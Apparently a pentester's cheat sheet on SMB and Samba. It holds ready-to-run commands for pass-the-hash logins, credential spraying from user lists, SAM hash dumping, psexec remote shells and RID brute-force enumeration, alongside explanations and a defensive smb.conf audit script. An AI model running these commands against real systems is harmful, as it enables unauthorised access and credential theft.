SMB

About

Server Message Block (SMB) is a client-server protocol that regulates access to files, entire directories, and other network resources such as printers, routers, or interfaces shared on the network. The SMB protocol enables a client to communicate with other participants in the same network to access files or services shared with it. By default it uses ports 137, 138, 139, and 445.

CrackMapExec

Null-session login, or Pass-The-Hash Attack

crackmapexec smb 13.13.13.13 -u Administrator -d . -H 12379N1D2YV31U20931C031 -x whoami
OR
crackmapexec smb {DOMAIN} -u '' -p '' --shares
OR
crackmapexec smb {DOMAIN} -u 'blibbityblabbity' -p '' --shares

Check which users from a list can log in (here with an empty password):

crackmapexec smb {DOMAIN} -u users.txt -p '' -d . --continue-on-success
# Or try user=password pairs (each user with its own name as the password):
crackmapexec smb {DOMAIN} -u users.txt -p users.txt -d . --no-bruteforce --continue-on-success
Useful CrackMapExec options:

  • --shares - List SMB shares

  • --continue-on-success - Keep going after valid credentials are found (useful with user lists)

  • --no-bruteforce - Use the wordlists as given, pairing each user with the password on the same line instead of trying every combination

  • --rid-brute - Brute-force RIDs to enumerate users and groups

  • --local-auth - Authenticate against the local machine instead of the domain

  • -M - Use a module

  • --sam - Dump SAM hashes

  • --exec-method - Method used to execute commands

  • --loggedon-users - Enumerate logged-on users

Samba

Samba is an alternative implementation of the SMB server, developed for Unix-based operating systems. Samba implements the Common Internet File System (CIFS) network protocol. CIFS is a "dialect" of SMB; in other words, CIFS is a very specific implementation of the SMB protocol, which in turn was created by Microsoft. Therefore it is usually referred to as SMB/CIFS. However, CIFS is an extension of the SMB protocol.

  • A Samba server communicates over TCP ports 137, 138, and 139, but CIFS uses TCP port 445 only. In a network using Samba, each host participates in the same workgroup. A workgroup is a group name that identifies an arbitrary collection of computers and their resources on an SMB network.

  • The smbstatus command shows who is connected, from which host, and to which share.

  • Config location (print only the active, non-comment lines):

    cat /etc/samba/smb.conf | grep -v "#\|\;"

TOOLS

There are many different tools for SMB interaction:

Smbclient

Connecting to the Share with smbclient

smbclient -N -L //13.13.13.13

OR

smbclient -U username \\\\13.13.13.13\\share
  • -N is for a null session, i.e. anonymous access without entering a user/password. -L lists all shares.

  • For basic interaction with a share, you only need these commands:

    • help - list the available commands

    • ls - list files

    • get - download a file

    • !command - prefix a command with ! to execute it locally

SMBMap

  • Regular SMB enum

smbmap -H 13.13.13.13
  • Recursive SMB enum

smbmap -H 13.13.13.13 -r share
  • Download a file from the SMB share:

smbmap -H 13.13.13.13 --download "share\example.txt"
  • Upload a file to the SMB share:

smbmap -H 13.13.13.13 --upload example.txt "share\example.txt"

Impacket-smbclient

impacket-smbclient 'asdasda@domain.ad' -no-pass
sudo impacket-smbserver share ./ -smb2support # Creation of SMB Server

Impacket-psexec

impacket-psexec administrator:'amoguskek'@13.13.13.13
# Same goes for impacket-smbexec and impacket-atexec

RPCclient

Remote Procedure Call (RPC) is a concept and, therefore, also a central tool for building operational and work-sharing structures in networks and client-server architectures. In other words, RPC is a mechanism for interaction between processes that run on different nodes in the network. Communication via RPC includes passing parameters and returning the function's value. RPC also has a Remote Invocation Descriptor (RID), a unique identifier assigned to each remote procedure call that is used to keep track of and manage the execution of remote procedures. There is also a nice cheat sheet from the SANS Institute [LINK]

  • Connect to SMB server

rpcclient -U "" 13.13.13.13
rpcclient $> {function}

Once connected, rpcclient offers many functions, for example:

  • srvinfo - Server information

  • enumdomains - Enumerate all domains that are deployed in the network

  • querydominfo - Provides domain, server, and user information of deployed domains

  • netshareenumall - Enumerates all available shares

  • netsharegetinfo <share> - Provides information about a specific share

  • enumdomusers - Enumerates all domain users

  • queryuser <RID> - Provides information about a specific user

  • querygroup <RID> - Provides information about a specific group

Dangerous Settings

  • browseable = yes - Allow listing available shares in the current share?

  • read only = no - Forbid the creation and modification of files?

  • writable = yes - Allow users to create and modify files?

  • guest ok = yes - Allow connecting to the service without using a password?

  • enable privileges = yes - Honor privileges assigned to specific SID?

  • create mask = 0777 - What permissions must be assigned to the newly created files?

  • directory mask = 0777 - What permissions must be assigned to the newly created directories?

  • logon script = script.sh - What script needs to be executed on the user's login?

  • magic script = script.sh - Which script should be executed when the script gets closed?

  • magic output = script.out - Where the output of the magic script needs to be stored?
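To check a Samba configuration for the settings above automatically, here is an added example (not code from the original page): a small smb.conf parser plus an audit function that flags the risky parameters per share. The configuration it reads is constructed for the demo; the parameter names are Samba's.

```python
# Added example (not from the page): audit a Samba smb.conf for the risky
# settings listed above. The configuration below is constructed for the demo.
_yes = lambda v: v in ("yes", "true", "1")

# Parameter -> predicate on its lower-cased value that marks it as risky.
RISKY = {
    "browseable": _yes, "writable": _yes, "writeable": _yes,  # both spellings
    "guest ok": _yes, "enable privileges": _yes,
    "read only": lambda v: v in ("no", "false", "0"),
    "create mask": lambda v: v.lstrip("0") == "777",
    "directory mask": lambda v: v.lstrip("0") == "777",
    "logon script": bool, "magic script": bool, "magic output": bool,  # set at all
}

def parse_smb_conf(text):
    """Return {section: {parameter: value}}; '#'/';' lines are comments."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections

def audit(text):
    """Return {share: ['parameter = value', ...]} for shares with findings."""
    findings = {}
    for share, params in parse_smb_conf(text).items():
        hits = [f"{k} = {v}" for k, v in params.items()
                if k in RISKY and RISKY[k](v.lower())]
        if hits:
            findings[share] = hits
    return findings

# Constructed sample: a loosely configured share beside a hardened one.
SAMPLE_SMB_CONF = """
[public]
   browseable = yes
   writable = yes
   guest ok = yes
   create mask = 0777
   logon script = script.sh
[finance]
   browseable = no
   read only = yes
   guest ok = no
   create mask = 0660
"""
print(audit(SAMPLE_SMB_CONF))
```

Run it against /etc/samba/smb.conf on a real host by passing the file contents to audit(); only shares with at least one risky parameter are reported.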

Making a Share

As an example we will use Windows 10.

First, create a folder.

Then use the Advanced Sharing option to configure the share.

Keep in mind that with shared resources, both the SMB and NTFS permission lists apply to every resource that gets shared in Windows.

Here we can control NTFS permissions more precisely. If a checkbox is greyed out, that permission is inherited from the parent directory.

Mount a Share

sudo mount -t cifs -o username=venator17,password=ababagalabaga //13.13.13.13/"Sharename" /home/user/Desktop/

Tips2Hack

  1. To brute-force RIDs with rpcclient for active enumeration of users and groups, you can use this command:

for i in $(seq 500 1100);do rpcclient -N -U "" 13.13.13.13 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
  2. For the same purpose you can also try the samrdump.py script.

  3. You can use enum4linux-ng or enum4linux:

./enum4linux-ng.py 13.13.13.13 -A
  4. You can also monitor shares from the Computer Management tool, or view share access logs in Event Viewer.
